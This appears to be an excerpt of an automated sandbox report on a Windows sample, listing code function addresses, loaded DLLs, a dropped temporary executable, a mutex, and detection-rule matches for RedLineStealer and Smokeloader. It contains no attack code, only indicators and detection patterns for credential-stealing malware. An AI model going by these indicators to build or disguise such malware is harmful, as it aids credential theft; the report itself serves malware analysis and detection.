    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_007A7FBE0_2_007A7FBE
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_004088803_2_00408880
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0040B2B03_2_0040B2B0
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_004198403_2_00419840
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_004068503_2_00406850
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_004278603_2_00427860
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_004270703_2_00427070
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0043B8703_2_0043B870
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_004060003_2_00406000
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0043080E3_2_0043080E
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0043F8203_2_0043F820
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0041D0C03_2_0041D0C0
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_004418A03_2_004418A0
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0041194F3_2_0041194F
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0043F1503_2_0043F150
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0042B1703_2_0042B170
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_004039003_2_00403900
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_004251003_2_00425100
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_004399233_2_00439923
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_004271333_2_00427133
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_004339303_2_00433930
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_004121DB3_2_004121DB
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0042A9F73_2_0042A9F7
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0040E9B03_2_0040E9B0
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0041825B3_2_0041825B
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0042EA623_2_0042EA62
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0040CA623_2_0040CA62
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_00442A603_2_00442A60
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0041DAD03_2_0041DAD0
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_00429ADE3_2_00429ADE
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_00425AF03_2_00425AF0
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_004092A03_2_004092A0
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_00405AB03_2_00405AB0
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_004042B03_2_004042B0
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0043CB403_2_0043CB40
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0042EB5F3_2_0042EB5F
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_004083603_2_00408360
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_00428B673_2_00428B67
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_00437B693_2_00437B69
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_00402B203_2_00402B20
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_00441B203_2_00441B20
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_00432B243_2_00432B24
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_004063C03_2_004063C0
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0042DBF03_2_0042DBF0
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_004223803_2_00422380
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0041BBA03_2_0041BBA0
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0042BBA03_2_0042BBA0
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0042EBA13_2_0042EBA1
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0042EBB33_2_0042EBB3
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_00441BB03_2_00441BB0
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_00441C403_2_00441C40
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_004424703_2_00442470
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_00426C763_2_00426C76
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0041D4003_2_0041D400
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0041C4003_2_0041C400
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_004174053_2_00417405
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_00414C203_2_00414C20
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_004324263_2_00432426
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_004284373_2_00428437
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0043443D3_2_0043443D
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_004354C43_2_004354C4
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_00434CEF3_2_00434CEF
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0043A4EF3_2_0043A4EF
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_004374AB3_2_004374AB
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0041DCB03_2_0041DCB0
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0043ACB03_2_0043ACB0
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0042FCBC3_2_0042FCBC
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0040D5453_2_0040D545
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_00425D6A3_2_00425D6A
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_00435D133_2_00435D13
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_00442D203_2_00442D20
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0043CD273_2_0043CD27
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_00420D903_2_00420D90
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0043C5A03_2_0043C5A0
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_00421E703_2_00421E70
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_004366103_2_00436610
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_004076203_2_00407620
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0040AE303_2_0040AE30
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0041F6D03_2_0041F6D0
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_00416ED03_2_00416ED0
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0041BEE13_2_0041BEE1
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_00402EF03_2_00402EF0
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_004186FC3_2_004186FC
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_00423EFF3_2_00423EFF
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_00431E8E3_2_00431E8E
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0041A6903_2_0041A690
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_004157203_2_00415720
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0041AF243_2_0041AF24
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_00427F303_2_00427F30
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0040DFE23_2_0040DFE2
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_004257E03_2_004257E0
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_00429FE43_2_00429FE4
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0040CFEC3_2_0040CFEC
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_004097903_2_00409790
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_004427B03_2_004427B0
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_00441FB03_2_00441FB0
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0214D2533_2_0214D253
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0214E2493_2_0214E249
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_021462673_2_02146267
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0216A3053_2_0216A305
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0215D3273_2_0215D327
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0217F3B73_2_0217F3B7
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_021673B23_2_021673B2
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_021820173_2_02182017
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0214B0973_2_0214B097
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_021660B73_2_021660B7
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_021620D73_2_021620D7
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_021720F53_2_021720F5
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_021431573_2_02143157
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0215C1483_2_0215C148
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_021641663_2_02164166
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_021681973_2_02168197
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0215B18B3_2_0215B18B
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_021466273_2_02146627
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0215D6673_2_0215D667
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0215C6673_2_0215C667
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0217268D3_2_0217268D
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_021746A43_2_021746A4
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_021826D73_2_021826D7
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_021777123_2_02177712
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0217572B3_2_0217572B
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0217A7563_2_0217A756
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0214D7AC3_2_0214D7AC
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_021524423_2_02152442
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_021584C23_2_021584C2
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_021445173_2_02144517
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_021495073_2_02149507
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_021485C73_2_021485C7
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_021625E73_2_021625E7
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_02182A173_2_02182A17
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_02170A753_2_02170A75
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0217FA873_2_0217FA87
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_02146AB73_2_02146AB7
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_02159AA73_2_02159AA7
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0217BAD73_2_0217BAD7
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_02157AE43_2_02157AE4
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_02148AE73_2_02148AE7
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_02143B673_2_02143B67
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_02173B973_2_02173B97
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_02179B8A3_2_02179B8A
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_02151BB63_2_02151BB6
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0217C8073_2_0217C807
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_021768773_2_02176877
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_021478873_2_02147887
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0215A8F73_2_0215A8F7
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0215F9373_2_0215F937
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_021499F73_2_021499F7
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0216EE1A3_2_0216EE1A
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0216BE073_2_0216BE07
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0216EE083_2_0216EE08
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0216DE573_2_0216DE57
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_02154E873_2_02154E87
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0217AF173_2_0217AF17
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0215DF173_2_0215DF17
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0216FF233_2_0216FF23
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_02174F563_2_02174F56
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_02175F7A3_2_02175F7A
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_02182F873_2_02182F87
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_02160FF73_2_02160FF7
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_02157FFA3_2_02157FFA
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0214EC173_2_0214EC17
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0214CCC93_2_0214CCC9
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_02182CC73_2_02182CC7
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0216ECC93_2_0216ECC9
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_02145D173_2_02145D17
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0215DD373_2_0215DD37
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_02142D873_2_02142D87
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_02172D8B3_2_02172D8B
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0217CDA73_2_0217CDA7
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_02177DD03_2_02177DD0
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0216EDC63_2_0216EDC6
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: String function: 00410710 appears 53 times
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: String function: 00790977 appears 53 times
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: String function: 0040FDA8 appears 125 times
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: String function: 0040F8F9 appears 36 times
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: String function: 0079000F appears 121 times
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: String function: 00414C10 appears 116 times
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: String function: 02154E77 appears 116 times
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: String function: 021483D7 appears 77 times
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: String function: 00408170 appears 45 times
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7968 -s 1012
    Source: g3toRYa6JE.exeBinary or memory string: OriginalFileName vs g3toRYa6JE.exe
    Source: g3toRYa6JE.exe, 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs g3toRYa6JE.exe
    Source: g3toRYa6JE.exe, 00000000.00000003.1454826785.00000000021F0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs g3toRYa6JE.exe
    Source: g3toRYa6JE.exe, 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs g3toRYa6JE.exe
    Source: g3toRYa6JE.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: 00000003.00000002.1788938311.00000000005A3000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000000.00000002.3872584271.0000000000693000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: g3toRYa6JE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: ScreenUpdateSync[1].exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: 26A5.tmp.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: classification engineClassification label: mal100.troj.evad.winEXE@4/7@12/3
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_006942FE CreateToolhelp32Snapshot,Module32First,0_2_006942FE
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0043B870 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,3_2_0043B870
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\track_prt[1].htmJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeMutant created: \Sessions\1\BaseNamedObjects\5h48t4j4t1rr
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7968
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeFile created: C:\Users\user\AppData\Local\Temp\26A5.tmpJump to behavior
    Source: g3toRYa6JE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: g3toRYa6JE.exeVirustotal: Detection: 38%
    Source: g3toRYa6JE.exeReversingLabs: Detection: 50%
    Source: unknownProcess created: C:\Users\user\Desktop\g3toRYa6JE.exe "C:\Users\user\Desktop\g3toRYa6JE.exe"
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeProcess created: C:\Users\user\AppData\Local\Temp\26A5.tmp.exe "C:\Users\user\AppData\Local\Temp\26A5.tmp.exe"
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7968 -s 1012
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeProcess created: C:\Users\user\AppData\Local\Temp\26A5.tmp.exe "C:\Users\user\AppData\Local\Temp\26A5.tmp.exe" Jump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeSection loaded: msvcr100.dllJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeSection loaded: slc.dllJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeSection loaded: userenv.dllJump to behavior
